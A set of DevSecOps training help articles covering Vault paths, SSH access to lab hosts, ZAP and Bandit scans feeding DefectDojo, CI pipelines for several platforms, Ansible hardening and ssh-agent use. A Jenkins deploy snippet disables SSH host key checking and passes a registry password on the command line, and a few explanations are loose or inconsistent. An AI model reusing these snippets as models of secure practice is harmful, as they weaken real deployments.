Vault’s naming rules: - Use only alphanumeric characters, hyphens (-), underscores (_), and forward slashes (/). - Avoid leading or trailing slashes, and keep the path length reasonable (under 255 characters). Example: Creating a Custom Secrets Path # Enable the KV secrets engine at a custom mount point vault secrets enable -path=custom-secrets kv # Write a secret to a custom sub‑path vault kv put custom-secrets/app1/db password=SuperSecret123 # Read the secret back vault kv get custom-secrets/app1/db Best Practices - Naming conventions: team/project/environment (e.g., devops/ci-pipeline/prod). - Access control: Attach policies to the exact path to enforce least‑privilege. - Documentation: Keep a living diagram of your path hierarchy for onboarding and audits. 3. SSH Access to GitLab Machines Identifying the Right Host | Hostname Pattern | What It Represents | |------------------|--------------------| | gitlab-ce-<MachineID> | The GitLab Community Edition server (the central GitLab instance). | | gitlab-runner-<ID> | A GitLab Runner node that executes CI/CD jobs. | How to SSH In 1. Locate the SSH credentials provided in your lab environment (usually a private key file id_rsa_lab). 2. Add the key to your SSH agent: eval "$(ssh-agent -s)" ssh-add /path/to/id_rsa_lab 3. Connect using the hostname supplied in the lab instructions: ssh <username>@gitlab-ce-12345 # or for a runner ssh <username>@gitlab-runner-3muz998d 4. Verify the connection by checking the GitLab version: gitlab-rake gitlab:env:info Common Pitfalls - DNS resolution: If the hostname does not resolve, add an entry to your local /etc/hosts file as instructed by the lab. - Port changes: Some labs expose SSH on a non‑standard port (e.g., 2222). Use ssh -p 2222 user@host. 4. Finding the Physical Location of a GitLab Repository on the Host How GitLab Stores Repositories GitLab uses hashed storage by default. Each project is stored under a directory derived from a SHA‑256 hash of the namespace and project name. Typical path pattern: /var/opt/gitlab/git-data/repositories/@hashed/<first-two-chars>/<next-two-chars>/<full-hash>.git Viewing the Repository with the tree Command # Navigate to the base storage directory cd /var/opt/gitlab/git-data/repositories/@hashed # Show the tree for a specific project (replace <hash> with your project's hash) tree -L 2 <first-two>/<next-two>/<full-hash>.git Note: The GUI shows a friendly project name, while the filesystem uses the hash, so the directory names will not match the UI directly. Quick Way to Map a Project to Its Hash 1. Get the project ID from the GitLab UI (Project → Settings → General → Project ID). 2. Run the following Ruby command on the GitLab server (requires admin rights): gitlab-rails console -e production project = Project.find(<PROJECT_ID>) puts project.disk_path # => the hashed path Tips for Lab Environments - Use sudo gitlab-rails runner "puts Project.find_by_path('mygroup/myproject').disk_path" to retrieve the exact path in one line. - Remember that you need root or gitlab‑rails user permissions to explore the storage directories. Common Questions & Quick Tips | Question | Quick Answer | |----------|--------------| | Can I keep my German keyboard layout and still type |? | Yes, use the US layout temporarily or the Unicode entry method. | | Do Vault paths have to start with secret/? | No. Paths are defined by the mount point you choose (e.g., custom-secrets/). | | What if SSH to a GitLab host times out? | Verify the hostname, ensure your private key is loaded, and check for custom SSH ports. | | Why does the repository folder look different from the GitLab UI? | GitLab stores repos using hashed directories for scalability and security; the UI maps these hashes to friendly names. | Conclusion Navigating lab environments efficiently requires a blend of keyboard tricks, Vault path flexibility, SSH know‑how, and an understanding of GitLab’s storage architecture. By applying the steps and best practices outlined above, you’ll eliminate common stumbling blocks, focus on the core DevSecOps concepts, and make the most of your hands‑on learning experience. Happy hacking!

Last updated on Jan 26, 2026

Running ZAP Scans and Uploading Results to DefectDojo – A Step‑by‑Step Guide

Running ZAP Scans and Uploading Results to DefectDojo – A Step‑by‑Step Guide In this article you’ll learn how to execute an OWASP ZAP scan from the DevSecOps Box, troubleshoot common errors, understand key Docker mount points, and automatically push the scan results to DefectDojo using the provided upload-results.py script. The guide covers four frequent questions that learners encounter while working through the Practical DevSecOps labs, and it includes ready‑to‑copy Jenkins pipeline snippets for continuous‑delivery scenarios. Table of Contents 1. Prerequisites 2. Scanning the Production Machine with ZAP - 2.1 Fixing the “expected File … zap‑output.xml to exist” error 3. Understanding the /zap/wrk mount point 4. Using the --environment flag in upload-results.py 5. Uploading ZAP Results to DefectDojo from Jenkins - 5.1 Full Jenkins stage example 6. Tips & Common Questions Prerequisites | Requirement | Why It Matters | How to Verify | |-------------|----------------|---------------| | GitLab repository cloned on the DevSecOps Box | ZAP writes its output into the repository’s working directory. | Run ls -la in the box; you should see your project folder (e.g., django-nv). | | Docker (image softwaresecurityproject/zap-stable:2.13.0) | Provides a consistent ZAP environment. | docker version | | Python 3 with requests library installed (used by upload-results.py) | Needed for the API call to DefectDojo. | python3 -c "import requests" | | DefectDojo credentials (DOJO_HOST & DOJO_API_TOKEN) stored in Jenkins or the box | Allows authenticated uploads. | echo $DOJO_HOST / echo $DOJO_API_TOKEN (mask in CI). | Scanning the Production Machine with ZAP The lab asks you to run a ZAP baseline scan against the production URL https://prod-fmrtdibo.lab.practical-devsecops.training and store the XML report at /django-nv/zap-output.xml. Typical command (run from the DevSecOps Box) cd /django-nv # <-- ensure you are inside the cloned repo docker run --rm -v $(pwd):/zap/wrk \ -t softwaresecurityproject/zap-stable:2.13.0 \ zap-baseline.py -t https://prod-fmrtdibo.lab.practical-devsecops.training \ -r zap-output.xml - -v $(pwd):/zap/wrk mounts your current directory into the container at /zap/wrk. - zap-baseline.py performs a quick, unauthenticated scan and writes zap-output.xml inside the mounted folder. Fixing the “expected File … zap‑output.xml to exist” error If you see: expected File /django-nv/zap-output.xml to exist the most common causes are: 1. Repository not cloned – The /django-nv path does not exist on the box. Solution: Clone the GitLab repo first: git clone https://gitlab.com/your‑group/django-nv.git /django-nv 2. Wrong working directory – You ran the Docker command from a different folder, so the mount point is empty. Solution: cd /django-nv before executing the Docker run command. 3. Permission issues – The container cannot write to the host directory. Solution: Ensure the directory is owned by your user (chown -R $(whoami) /django-nv) or run Docker with appropriate user flags. After correcting the above, re‑run the scan. You should now see zap-output.xml inside /django-nv and be able to mark the lab task as complete. Understanding the /zap/wrk Command /zap/wrk is not a command; it is the target directory inside the Docker container where the host’s current working directory ($(pwd)) is mounted. Host directory (e.g., /django-nv) → Docker container path /zap/wrk Why it matters: - File persistence – Anything written to /zap/wrk inside the container ends up on the host, allowing you to keep the ZAP report after the container exits. - Consistency across tools – Many Docker‑based security tools (e.g., Trivy, Grype) follow the same pattern: you must supply a -v $(pwd):/some/path and often a -w /some/path flag so the tool knows where to read/write files. If you omit the mount, the container writes the report to an ephemeral filesystem that disappears when the container stops, leading to the “file does not exist” error. Using the --environment Flag in upload-results.py The script upload-results.py pushes scan artifacts to DefectDojo via its REST API. The --environment argument tells DefectDojo which environment the scan represents (e.g., Development, Staging, Production). python3 upload-results.py \ --host $DOJO_HOST \ --api-key $DOJO_API_TOKEN \ --engagement_id 1 \ --product_id 1 \ --lead_id 1 \ --environment "Production" \ --result_file zap-output.xml \ --scanner "ZAP Scan" Benefits: - Filtering – In DefectDojo you can view findings per environment, making it easy to compare a dev build against production. - Reporting – Automated dashboards can highlight regressions that only appear in production. - Audit trail – Knowing the origin environment satisfies compliance requirements. Uploading ZAP Results to DefectDojo from Jenkins The lab’s Jenkins exercise asks you to create a new stage called defectdojo that uploads the ZAP XML generated in the previous zap-baseline stage. The key steps are: 1. Copy the artifact from the earlier stage (using the Copy Artifact plugin). 2. Install Python dependencies inside the Jenkins agent. 3. Set the locale to UTF‑8 (prevents character‑encoding errors when the XML contains non‑ASCII symbols). 4. Run upload-results.py with the proper credentials. Full Jenkins stage example (Declarative Pipeline) pipeline { agent any stages { stage('zap-baseline') { steps { // ... ZAP scan that archives zap-output.xml ... archiveArtifacts artifacts: 'zap-output.xml', fingerprint: true } } stage('defectdojo') { steps { // 1️⃣ Pull the ZAP report from the previous stage copyArtifacts filter: 'zap-output.xml', fingerprintArtifacts: true, projectName: 'django.nv', selector: specific(env.BUILD_NUMBER) // 2️⃣ Ensure UTF‑8 locale (prevents XML parsing errors) sh 'export LC_ALL=C.UTF-8' // 3️⃣ Install Python request library (runs only if not cached) sh 'pip3 install --user requests' // 4️⃣ Upload to DefectDojo withCredentials([ string(credentialsId: 'dojo-host', variable: 'DOJO_HOST'), string(credentialsId: 'dojo-api-token', variable: 'DOJO_API_TOKEN') ]) { sh ''' python3 upload-results.py \ --host $DOJO_HOST \ --api-key $DOJO_API_TOKEN \ --engagement_id 1 \ --product_id 1 \ --lead_id 1 \ --environment "Production" \ --result_file zap-output.xml \ --scanner "ZAP Scan" ''' } } } } post { always { cleanWs() } } } Key points in the script - LC_ALL=C.UTF-8 – forces the shell to use UTF‑8 encoding, avoiding “UnicodeDecodeError”. - withCredentials – securely injects the DefectDojo host and API token. - copyArtifacts – transfers zap-output.xml from the zap-baseline stage to the current workspace. Tips & Common Questions | Question | Quick Answer | |----------|--------------| | Why does the upload fail with “UnicodeDecodeError”? | Add export LC_ALL=C.UTF-8 (or LANG=C.UTF-8) before running the Python script. | | Can I use a JSON report instead of XML? | Yes – ZAP can output JSON (-J zap-output.json). Just change --result_file and set --scanner "ZAP JSON". | | Do I need to run pip install requests on every build? | Not if you cache the virtual environment or use a Docker agent that already includes the library. | | What if the Jenkins stage still can’t find zap-output.xml? | Verify the artifact name in the archiveArtifacts step of the previous stage and ensure the filter pattern matches exactly. | | Is the --environment value case‑sensitive? | DefectDojo stores it as a free‑text field, but it’s best to keep the same capitalization across builds for consistent filtering. | Final Checklist - [ ] Clone the GitLab repo to /django-nv on the DevSecOps Box. - [ ] Run the ZAP Docker command from /django-nv. - [ ] Confirm zap-output.xml exists after the scan. - [ ] Set the locale to UTF‑8 before invoking upload-results.py. - [ ] Use Jenkins Copy Artifact and the provided pipeline snippet to push results to DefectDojo. By following this guide, you’ll be able to execute ZAP scans reliably, troubleshoot the most common pitfalls, and integrate the findings into DefectDojo for centralized vulnerability management. Happy hacking—and keep your pipelines secure!

Last updated on Jan 06, 2026

Integrating Bandit and Other Security Scans into CI/CD Pipelines (GitLab, Jenkins, GitHub Actions & CircleCI)

Integrating Bandit and Other Security Scans into CI/CD Pipelines (GitLab, Jenkins, GitHub Actions & CircleCI) Security‑as‑code is a core pillar of DevSecOps. Whether you use GitLab CI, Jenkins, GitHub Actions, or CircleCI, you can run static‑application‑security‑testing (SAST) tools such as Bandit and automatically publish the findings to downstream systems (e.g., DefectDojo). This article walks through the most common pitfalls and shows you reliable patterns for: 1. Running Bandit in a GitLab CI job and preserving the JSON report. 2. Building, testing, releasing, and deploying a Django app with Jenkins while pushing Docker images to a private registry. 3. Executing Bandit in GitHub Actions, handling “job‑failed‑because‑vulnerabilities‑found” scenarios, and uploading results to DefectDojo. 4. Understanding why a failing integration step does not stop other independent jobs in CircleCI. 1. GitLab CI – Keep the Bandit Report Even When the Scan Fails The problem When when: on_fail (or when: fail) is used under the docker run step, the job stops on a non‑zero exit code and no artifact is saved. Removing the condition lets the job finish, but the pipeline aborts on the first failure. The solution – Use when: always and separate the scan from the artifact step # .gitlab-ci.yml sast: image: docker:latest # optional – you can also use the default runner image services: - docker:dind # needed for Docker-in‑Docker stage: test script: # 1️⃣ Run Bandit – always succeed (ignore exit code) - docker run --rm -v "$(pwd)":/src hysnsec/bandit \ -r /src -f json -o /src/bandit-output.json || true artifacts: when: always # always upload, even if the job is marked failed paths: - bandit-output.json expire_in: 1 week Key points | Element | Why it matters | |---------|----------------| | docker run … || true | Forces the command to exit with 0 so the job continues. Bandit still returns a non‑zero code when vulnerabilities are found, but we capture the JSON report regardless. | | artifacts.when: always | Guarantees the JSON file is uploaded even when the job is later marked failed. | | script vs. separate run steps | In GitLab CI a single script block runs sequentially; you don’t need an extra run step for ls -al unless you want debugging output. | 2. Jenkins – Full CI/CD Flow with Docker Registry & DefectDojo Below is a declarative pipeline that builds a Django project, runs unit tests, pushes a Docker image to a private GitLab registry, and finally deploys to production after a manual approval. pipeline { agent any environment { REGISTRY_URL = "gitlab-registry-JnOHfNpe.lab.practical-devsecops.training" REGISTRY_CREDS = "registry-auth" } stages { stage('Build') { agent { docker { image 'python:3.6' args '-u root' } } steps { sh ''' python3 -m venv env . env/bin/activate pip install -r requirements.txt python manage.py check ''' } } stage('Test') { agent { docker { image 'python:3.6' args '-u root' } } steps { sh ''' . env/bin/activate pip install -r requirements.txt python manage.py test taskManager ''' } } stage('Release') { steps { script { def image = docker.build("${REGISTRY_URL}/root/django-nv:${BUILD_NUMBER}") docker.withRegistry("https://${REGISTRY_URL}", REGISTRY_CREDS) { image.push() } } } } stage('Integration') { steps { // Do not fail the whole pipeline – just mark this stage as failed catchError(buildResult: 'SUCCESS', stageResult: 'FAILURE') { echo "This is an integration step" sh 'exit 1' // simulated failure } } } stage('Prod') { when { tag "release-*" } steps { input message: 'Deploy to production?', ok: 'Deploy' withCredentials([ string(credentialsId: 'prod-server', variable: 'DEPLOYMENT_SERVER'), string(credentialsId: 'docker_username', variable: 'DOCKER_USERNAME'), string(credentialsId: 'docker_password', variable: 'DOCKER_PASSWORD') ]) { sh """ ssh -o StrictHostKeyChecking=no root@${DEPLOYMENT_SERVER} ' docker login -u ${DOCKER_USERNAME} -p ${DOCKER_PASSWORD} ${REGISTRY_URL} docker rm -f django.nv || true docker pull ${REGISTRY_URL}/root/django-nv:${BUILD_NUMBER} docker run -d --name django.nv -p 8000:8000 ${REGISTRY_URL}/root/django-nv:${BUILD_NUMBER} ' """ } } } } post { failure { updateGitlabCommitStatus name: env.STAGE_NAME, state: 'failed' } success { updateGitlabCommitStatus name: env.STAGE_NAME, state: 'success' } always { cleanWs(deleteDirs: true, disableDeferredWipeout: true) } } } Highlights for learners - catchError – mirrors the GitLab allow_failure pattern; the pipeline continues while the stage is marked red. - Docker‑in‑Docker – docker.build creates an image locally, then docker.withRegistry pushes it securely using stored credentials. - Manual approval – input forces a human gate before production deployment. 3. GitHub Actions – Running Bandit, Ignoring Vulnerability‑Induced Failures, and Sending Results to DefectDojo Why the job fails Bandit exits with a non‑zero status when it discovers security issues. GitHub Actions treats any non‑zero exit code as a failed step, which stops downstream steps unless you explicitly tell the runner to ignore the error. Updated workflow snippet name: SAST – Bandit Scan on: push: branches: [ main ] jobs: bandit-scan: runs-on: ubuntu-latest steps: # 1️⃣ Checkout the repo - uses: actions/checkout@v2 # 2️⃣ Run Bandit – continue even if vulnerabilities are found - name: Run Bandit run: | docker run --rm -v "$(pwd)":/src hysnsec/bandit \ -r /src -f json -o /src/bandit-output.json continue-on-error: true # <‑‑ crucial # 3️⃣ Upload the JSON report as an artifact (always run) - name: Upload Bandit report uses: actions/upload-artifact@v2 with: name: bandit-report path: bandit-output.json if: always() # keep the artifact even on failure # 4️⃣ Install Python (required by the upload script) - name: Set up Python uses: actions/setup-python@v2 with: python-version: '3.6' # 5️⃣ Push findings to DefectDojo - name: Send results to DefectDojo run: | python upload-results.py \ --host ${{ secrets.DOJO_HOST }} \ --api_key ${{ secrets.DOJO_API_TOKEN }} \ --engagement_id 1 \ --product_id 1 \ --lead_id 1 \ --environment "Production" \ --result_file bandit-output.json \ --scanner "Bandit Scan" continue-on-error: true # optional – you may want the pipeline to succeed regardless Explanation of key directives | Directive | Purpose | |-----------|---------| | continue-on-error: true (step level) | Prevents a non‑zero exit from aborting the job. The step is marked yellow (failed but allowed). | | if: always() | Guarantees the artifact upload runs even when the previous step is marked failed. | | setup-python | Required only because the upload script is a Python program; you can replace it with any runtime you need. | 4. CircleCI – Why Independent Jobs Keep Running After a Failure The observation In the “integration” job we deliberately run exit 1. The UI shows the job as failed, yet the subsequent “prod” job still executes. The underlying rule CircleCI treats each job as an isolated unit of work. A failure in one job does not automatically cancel downstream jobs unless you create an explicit dependency using the requires keyword (or the newer needs syntax). Example workflow showing the effect version: 2.1 jobs: build: docker: [{image: python:3.6}] steps: [checkout, run: echo "building"] integration: docker: [{image: python:3.6}] steps: - run: echo "integration step" - run: exit 1 # intentional failure prod: docker: [{image: python:3.6}] steps: [run: echo "deploy to prod"] workflows: version: 2 pipeline: jobs: - build - integration: requires: - build - prod: requires: - integration # <‑‑ comment this line to make prod independent - When requires: - integration is present, the prod job will be skipped if integration fails. - When the requires line is omitted (or you use type: approval for a manual gate), prod runs regardless of the integration outcome. Takeaway for learners - Use requires/needs to model true dependencies. - If you want a “best‑effort” job that should always run (e.g., cleanup, reporting), deliberately omit the dependency or add when: always in GitLab‑style pipelines. Common Questions & Tips | Question | Quick Answer | |----------|--------------| | How do I keep a job’s artifacts when the scan fails? | In GitLab use artifacts.when: always. In GitHub Actions use if: always() on the upload step and continue-on-error: true on the scan step. | | Can I make a Jenkins stage “optional” like GitLab’s allow_failure? | Yes – wrap the steps in catchError(buildResult: 'SUCCESS', stageResult: 'FAILURE'). | | What if I want the pipeline to stop on the first security failure? | Remove continue-on-error / || true and let the tool’s non‑zero exit code propagate. | | Do I need Docker‑in‑Docker for Bandit in GitLab? | Only when the runner itself isn’t a Docker image that already contains Bandit. Using docker run with the host’s Docker socket (-v /var/run/docker.sock:/var/run/docker.sock) is another option. | | How do I pass secrets to a Docker container in CI? | Mount them as environment variables (-e VAR=value) or use the CI platform’s secret‑store (GitLab CI variables, Jenkins credentials, GitHub Actions secrets). | TL;DR Checklist - GitLab CI – Run Bandit with || true, set artifacts.when: always. - Jenkins – Use catchError for non‑blocking stages, push Docker images with docker.withRegistry. - GitHub Actions – Add continue-on-error: true to the Bandit step; always upload the artifact. - CircleCI – Define explicit job dependencies (requires/needs) if a failure should block downstream jobs. By applying these patterns, you’ll have reliable security‑testing pipelines that never lose evidence, continue when appropriate, and fail fast when you need a hard stop. Happy securing!

Last updated on Jan 06, 2026

Hardening Linux and Windows with Ansible in a CI/CD Pipeline

Hardening Linux and Windows with Ansible in a CI/CD Pipeline Learn how to integrate security‑hardening playbooks into your CI/CD workflow, understand when builds should fail, and master authentication for both Linux and Windows targets. Introduction Automating security hardening is a cornerstone of modern DevSecOps. By using Ansible you can apply consistent, repeatable configurations to Linux and Windows hosts directly from your CI/CD pipeline. This article explains: - When a pipeline should be marked as failed based on Ansible results. - Why private keys are (or aren’t) required in lab environments. - How to manage SSH/WinRM authentication and the role of known_hosts. - A step‑by‑step example of wiring hardening playbooks into a typical CI/CD job. Whether you are preparing for a DevSecOps certification or simply want to tighten your production environment, the concepts below will help you build a reliable, secure automation flow. 1. When Should the CI/CD Pipeline Fail? 1.1 Ansible task outcomes | Outcome | Description | Impact on pipeline | |---------|-------------|--------------------| | ok | Task executed successfully, no changes needed. | Build continues. | | changed | Task applied a change (e.g., updated a permission). | Build continues – change is expected. | | failed | Task could not complete (e.g., permission denied, missing file). | Pipeline fails if the exit code propagates. | | skipped | Condition not met (e.g., OS‑specific task on the wrong platform). | Build continues. | | unreachable | Host could not be contacted (SSH/WinRM error). | Pipeline fails – no way to enforce hardening. | 1.2 How Ansible exit codes affect CI/CD - Exit code 0 – All tasks completed (including changed). CI/CD treats the job as successful. - Exit code 2 – At least one task failed. Most CI runners (GitLab, GitHub Actions, Azure Pipelines) mark the step as failed. - Exit code 1 – Generic error (e.g., syntax error in the playbook). Also fails the job. Tip: Use ignore_errors: true only for non‑critical hardening steps, and capture the result with register so you can decide later whether to abort the pipeline. 1.3 Practical example - name: Enforce secure file permissions file: path: /etc/ssh/sshd_config mode: '0600' owner: root group: root become: true register: perm_result failed_when: perm_result is failed If the file module cannot set the mode (perhaps because the file is locked), Ansible returns a non‑zero exit code, causing the CI job to fail automatically. 2. Authentication in Lab vs. Production Environments 2.1 Why labs often omit a private key - Pre‑provisioned credentials – Lab environments typically expose a default SSH key pair on the build agent, allowing password‑less access to the target VMs. - Security sandbox – Since the lab is isolated, the risk of key leakage is minimal, so the instructor can skip the step of uploading a personal private key. Remember: In real projects you should never embed private keys in the repository. Use secret managers (HashiCorp Vault, Azure Key Vault, GitHub Secrets) and inject them at runtime. 2.2 Adding your own public key to known_hosts When you connect to a new host for the first time, SSH performs a host key verification. Adding the server’s fingerprint to ~/.ssh/known_hosts (via ssh-keyscan) prevents interactive prompts and protects against man‑in‑the‑middle attacks. ssh-keyscan -t rsa devsecops-box-p29i9pmx >> ~/.ssh/known_hosts - The command fetches the RSA host key and appends it to the local trust store. - After this step, Ansible can run non‑interactive SSH commands safely. 2.3 Windows authentication with WinRM - Kerberos or NTLM – Most CI runners use a service account with a password stored as a secret. - Certificate‑based auth – For higher security, configure WinRM to accept client certificates and store the cert in the pipeline’s secret store. Reference implementations: - juju4/ansible-harden-windows - dev-sec/ansible-collection-hardening 3. Integrating Hardening Playbooks into CI/CD 3.1 High‑level workflow 1. Checkout code – Pull the repository containing the hardening playbooks. 2. Prepare credentials – Export SSH private key or WinRM password from secret storage. 3. Run inventory discovery – Dynamically generate an Ansible inventory (e.g., from Terraform output). 4. Execute hardening playbook – ansible-playbook -i inventory.yml site.yml. 5. Evaluate exit code – CI runner automatically fails the job on non‑zero codes. 3.2 Sample GitHub Actions job name: Hardening CI on: push: branches: [ main ] jobs: harden: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - name: Set up SSH key run: | echo "${{ secrets.SSH_PRIVATE_KEY }}" > ~/.ssh/id_rsa chmod 600 ~/.ssh/id_rsa ssh-keyscan -t rsa ${{ secrets.TARGET_HOST }} >> ~/.ssh/known_hosts - name: Install Ansible run: sudo apt-get update && sudo apt-get install -y ansible - name: Run Linux hardening run: | ansible-playbook -i inventory.yml linux-hardening.yml If any task in linux-hardening.yml fails, the job stops with a red X, providing immediate feedback to developers. 4. Common Questions & Tips Q1: Will a “changed” task cause the pipeline to fail? A: No. “changed” is a normal part of idempotent automation. Only a non‑zero exit code (failed/unreachable) triggers a failure. Q2: Can I ignore a specific hardening failure without breaking the whole pipeline? A: Use ignore_errors: true on the task and evaluate the result later. Example: - name: Ensure auditd is installed package: name: auditd state: present ignore_errors: true register: auditd_res Q3: Do I need to add every host to known_hosts? A: For static inventories, yes, once per host. For dynamic inventories, you can automate the ssh-keyscan step inside the pipeline. Q4: How do I handle Windows hosts that require self‑signed certificates? A: Export the certificate, store it as a secret, and configure WinRM with ansible_winrm_transport=certificate. See the ansible-collection-hardening docs for a ready‑made role. Tips for a Smooth Experience - Validate playbooks locally with ansible-playbook --check --diff before committing. - Enable Ansible’s --flush-cache in CI to avoid stale facts. - Log the full Ansible output (-vvv) to aid debugging when a build fails. - Separate “audit” and “remediate” runs – first run a read‑only audit playbook, then conditionally trigger the hardening playbook only if drift is detected. 5. Summary Hardening Linux and Windows systems with Ansible fits naturally into a CI/CD pipeline: - Failure detection relies on Ansible’s exit codes; any task that cannot apply a security control will cause the build to fail. - Authentication differs by OS—SSH for Linux (with known_hosts verification) and WinRM for Windows (password or certificate). - Lab environments often simplify credential handling, but production pipelines must use secret management and host verification. By following the workflow and best‑practice tips outlined above, you can deliver continuously hardened infrastructure, catch compliance gaps early, and maintain a secure DevSecOps posture. Happy automating!

Last updated on Jan 06, 2026

SSH Key Management & Authentication Agent: A Complete Guide for DevSecOps Learners

SSH Key Management & Authentication Agent: A Complete Guide for DevSecOps Learners Managing SSH keys securely is a core skill for anyone working in DevSecOps. This article explains why you add keys to known_hosts, what the ssh-add command does, how the SSH authentication agent works, and where its configuration lives. By the end of the guide you’ll be able to set up and use SSH keys confidently in labs, real‑world projects, and certification exams. Table of Contents 1. Why Add Your Public Key to known_hosts? 2. Understanding the ssh-add Command 3. The SSH Authentication Agent Explained - Where Is the Agent Configured? 4. Practical Walk‑through: From Key Generation to Connection 5. Tips & Common Questions Why Add Your Public Key to known_hosts? When you SSH to a server for the first time, SSH stores the server’s host key in ~/.ssh/known_hosts. This file acts as a fingerprint that tells your client, “I have connected to this exact server before; if the fingerprint changes, something is wrong.” Adding your own public key In many DevSecOps labs you are asked to run a command such as: ssh-keyscan -t rsa devsecops-box-p29i9pmx >> ~/.ssh/known_hosts Even though the command uses your own machine’s hostname, the same security principle applies: | Reason | What Happens | |--------|--------------| | Man‑in‑the‑Middle (MITM) protection | The client verifies the server’s host key against the entry in known_hosts. If an attacker tries to impersonate the server, the fingerprint won’t match and the connection is aborted. | | Predictable environment | Labs often spin up fresh VMs. Adding the host key manually guarantees that the client trusts the exact instance you intend to use, avoiding the “Are you sure you want to continue connecting (yes/no)?” prompt. | | Automation friendliness | Scripts that run non‑interactive SSH commands (e.g., scp, ansible) need a pre‑populated known_hosts to avoid hanging for user input. | Bottom line: Adding the host’s public key to known_hosts is a verification step, not a way to “give the server access to you.” It assures you are talking to the right server. For a deeper dive, see the SSH Academy article on Known Host Keys. Understanding the ssh-add Command ssh-add works with the SSH authentication agent (often ssh-agent). Its purpose is to load private keys into the agent so you don’t have to type a passphrase for each new SSH connection. What ssh-add does 1. Reads a private key (default is ~/.ssh/id_rsa if you run ssh-add without arguments). 2. Prompts for the key’s passphrase (if the key is encrypted). 3. Stores the decrypted key in memory inside the running ssh-agent. 4. Makes the key available to any SSH client that contacts the agent during the same session. Typical usage patterns # Start an agent (most shells do this automatically) eval "$(ssh-agent -s)" # Add the default key ssh-add # prompts for passphrase if needed # Add a specific key ssh-add ~/.ssh/ci_deploy_rsa # List keys currently loaded ssh-add -l # Remove all keys (useful before switching projects) ssh-add -D Why use ssh-add? - Convenience: One passphrase entry per session, not per connection. - Security: Private keys never touch the disk after being loaded; they stay in the agent’s protected memory. - Automation: CI/CD pipelines can load keys once and then run many Git or remote‑exec commands without interactive prompts. The SSH Authentication Agent Explained ssh-agent is a background daemon that holds your decrypted private keys and supplies them to SSH clients on demand. Core responsibilities - Key storage: Keeps private keys in memory, encrypted with the user’s login credentials. - Signing requests: When a remote server challenges you, the agent signs the challenge with the appropriate private key and returns the signature. - Key selection: If multiple keys are loaded, the agent can try them sequentially or based on the IdentitiesOnly option. Where is the agent’s configuration stored? The agent itself does not have a persistent configuration file. Instead, you control its behavior through: | File | Purpose | |------|---------| | ~/.ssh/config | Per‑host or global SSH client settings (e.g., AddKeysToAgent yes, IdentityFile ~/.ssh/id_rsa). | | Environment variables | SSH_AUTH_SOCK points to the Unix socket the agent listens on; SSH_AGENT_PID holds the process ID. | | Shell startup scripts (~/.bashrc, ~/.zshrc) | Often contain eval "$(ssh-agent -s)" and ssh-add commands to start the agent automatically. | Example ~/.ssh/config snippet: Host * AddKeysToAgent yes UseKeychain yes # macOS only – stores passphrase in the system keychain IdentityFile ~/.ssh/id_rsa Practical Walk‑through: From Key Generation to Connection Below is a step‑by‑step example that mirrors a typical DevSecOps lab. 1. Generate a new key pair (skip if you already have one). ssh-keygen -t rsa -b 4096 -C "student@example.com" # Accept default location (~/.ssh/id_rsa) and set a strong passphrase. 2. Add the server’s host key to known_hosts. ssh-keyscan -t rsa devsecops-box-p29i9pmx >> ~/.ssh/known_hosts 3. Start the authentication agent (if not already running). eval "$(ssh-agent -s)" 4. Load your private key into the agent. ssh-add ~/.ssh/id_rsa 5. Connect to the lab machine. ssh devsecops@devsecops-box-p29i9pmx Because the host key is already trusted and the private key is cached in the agent, the connection proceeds without any further prompts. 6. Optional: Verify the loaded keys. ssh-add -l # shows fingerprints of keys held by the agent Tips & Common Questions ✅ Tips for Smooth SSH Workflows - Add keys automatically: Include AddKeysToAgent yes in ~/.ssh/config so ssh adds a key to the agent the first time you use it. - Use the macOS Keychain: On macOS, UseKeychain yes stores the passphrase securely and reloads it after reboots. - Limit known_hosts size: Periodically prune stale entries with ssh-keygen -R hostname. - Forward the agent when needed: Use ssh -A or set ForwardAgent yes in the config to let remote hosts use your local keys (use with caution). ❓ Frequently Asked Questions | Question | Answer | |----------|--------| | Do I need to add my public key to known_hosts? | No. known_hosts stores host keys, not your public key. The command ssh-keyscan fetches the server’s host key and appends it. | | What if I forget to start ssh-agent? | SSH will fall back to asking for the key’s passphrase each time. Run eval "$(ssh-agent -s)" and ssh-add to fix it. | | Can I store the agent’s socket in a custom location? | Yes—set SSH_AUTH_SOCK=/tmp/custom_agent.sock before launching ssh-agent. This is useful for containerized environments. | | Is ssh-add -D safe to run? | It removes all keys from the current agent session. It’s safe, but you’ll need to re‑add any keys you still need. | | Why does ssh-add sometimes say “Could not open a connection to your authentication agent”? | The environment variable SSH_AUTH_SOCK is missing or points to a dead socket. Start a new agent with eval "$(ssh-agent -s)". | | how is the devsecops-box machine always able to ssh into prod for example? I killed the ssh-agent on the devsecops-box and it can still auth to prod | It's because we have designed the lab to store the production machine by default, and as long as the private key is there, you will be able to SSH into the production machine. In our DevSecOps Box, there is a private key stored at /root/.ssh/id_rsa. This key is being used to SSH into the production machine. If you remove that private key from /root/.ssh/, you will no longer be able to SSH into the production machine. | Wrap‑Up Effective SSH key management hinges on three pillars: 1. Trust the server – populate known_hosts with verified host keys. 2. Securely store private keys – load them once into ssh-agent using ssh-add. 3. Configure the client – use ~/.ssh/config to automate agent usage and key selection. By following the steps and best practices outlined above, you’ll reduce friction in labs, avoid common security pitfalls, and be ready for any DevSecOps certification exam that tests SSH proficiency. Happy secure connecting!

Last updated on Jan 26, 2026

SSH Keys in GitLab CI/CD: Why Double Quotes Matter & How to Fix Common Errors

SSH Keys in GitLab CI/CD: Why Double Quotes Matter & How to Fix Common Errors Working with SSH keys inside GitLab CI/CD pipelines can be tricky, especially for newcomers to DevSecOps. Small syntax issues—like missing double quotes—or malformed key data often lead to confusing error messages such as “Invalid format” or “Error loading key … error in libcrypto.” This article explains the role of double quotes when handling SSH‑key variables, walks you through the most frequent GitLab CI errors, and provides step‑by‑step solutions so your pipelines run smoothly. Table of Contents 1. Why Double Quotes Are Required for SSH Key Variables 2. Typical GitLab CI Errors Involving SSH Keys - 2.1 Invalid Format Errors - 2.2 Libcrypto Loading Errors 3. Step‑by‑Step Fixes - 3.1 Correctly Storing and Referencing Keys - 3.2 Testing the Key Inside a Job 4. Practical Example: Deploying with a Private Key 5. Tips & Best Practices 6. Common Questions Why Double Quotes Are Required Variable Expansion vs. Word Splitting - With double quotes ("$SSH_KEY"): The shell expands the variable once and treats the entire content as a single argument. This preserves line breaks and spaces that are intrinsic to PEM‑formatted keys. - Without double quotes ($SSH_KEY): The shell performs word splitting on whitespace. Each line of the key becomes a separate argument, breaking the PEM structure and causing the SSH client to reject the key. 